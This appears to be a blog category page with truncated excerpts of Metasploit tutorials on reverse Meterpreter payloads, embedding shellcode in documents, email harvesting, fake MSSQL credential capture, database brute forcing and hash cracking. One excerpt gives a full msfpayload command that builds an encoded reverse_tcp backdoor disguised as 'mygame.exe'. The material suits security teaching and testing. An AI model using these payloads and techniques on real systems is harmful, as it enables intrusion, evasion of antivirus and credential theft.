Category: Metasploit

All about Metasploit!

Hacking, Metasploit, RedTeaming

Simple Background HTTPS Reverse Meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more. Msfvenom is the combination of payload generation and encoding. msfvenom usage Usage: …

Metasploit

How to generate shellcode from custom exe in metasploit

To use a custom exe as a payload, or to embed your custom exe in a document or Excel file, you have to “convert” your exe to shellcode. To accomplish this: 1> Run Kali Linux 2> Open a terminal window 3> Type msfconsole and hit enter 4> Type use payload/generic/custom and hit enter 5> …

Information Gathering, Metasploit, Reconnaissance

Email harvesting with Metasploit

Email harvesting is the process of obtaining lists of email addresses using various methods. You can check on your own which emails attackers are going to find about your domain using Metasploit’s module, Search Engine Domain Email Address Collector. This module uses Google, Bing and Yahoo to create a list of valid email addresses for …

Backdoors, Metasploit

Create crypted Backdoor with Metasploit and Backtrack

We will use the windows/meterpreter/reverse_tcp payload. We will encode the payload 10 times with shikata_ga_nai and 10 times with call4_dword_xor.   1. Open console window   2. Type: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=1337 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t exe -c 10 -o mygame.exe …

Metasploit, Phishing

MSSQL Phishing with metasploit

Metasploit has an MSSQL capture module, called mssql. This module provides a fake MSSQL service that is designed to capture MSSQL server authentication credentials. The module supports both the weakly encoded database logins as well as Windows logins (NTLM).   To select the capture module type: use auxiliary/server/capture/mssql   Options You can set CAINPWFILE …

Metasploit, MSSQL

Brute forcing Microsoft SQL Server

Metasploit offers the auxiliary module mssql_login. This module will query the MSSQL instance for a specific username and password pair.   The default administrator’s username for SQL Server is sa. In the options of this module, you can specify a specific password, or a password list, a username list or a username-password list where usernames and …

Metasploit, MSSQL

Detecting a Microsoft SQL Server

Microsoft SQL Server (MSSQL) is a relational database management system (RDBMS) used to store, retrieve and manage information. As with many Microsoft products, SQL Server has many security weaknesses. Let’s start by identifying running SQL servers on the network.   Discover open MSSQL ports MSSQL is running by default on port 1433. To discover SQL …

Cracking, John the Ripper, Metasploit, MySQL

Cracking MySQL passwords with John The Ripper

Dump MySQL Password Hashes mysql_hashdump extracts the usernames and encrypted password hashes from a MySQL server. You can then use the jtr_mysql_fast module to crack them. The module is located in auxiliary/scanner/mysql. To use it, set the RHOSTS option to your target’s IP address and increase the THREADS value. If you have managed to reveal the root password then …

Brute-force, Databases, Metasploit, MySQL

Brute forcing MySQL

There is an auxiliary module in Metasploit called mysql_login which will happily query a MySQL server for specific usernames and passwords.   To start your attack you have to set the RHOSTS option and choose a username and a password if you would like a single login query. set RHOSTS 192.168.2.13 Let’s try …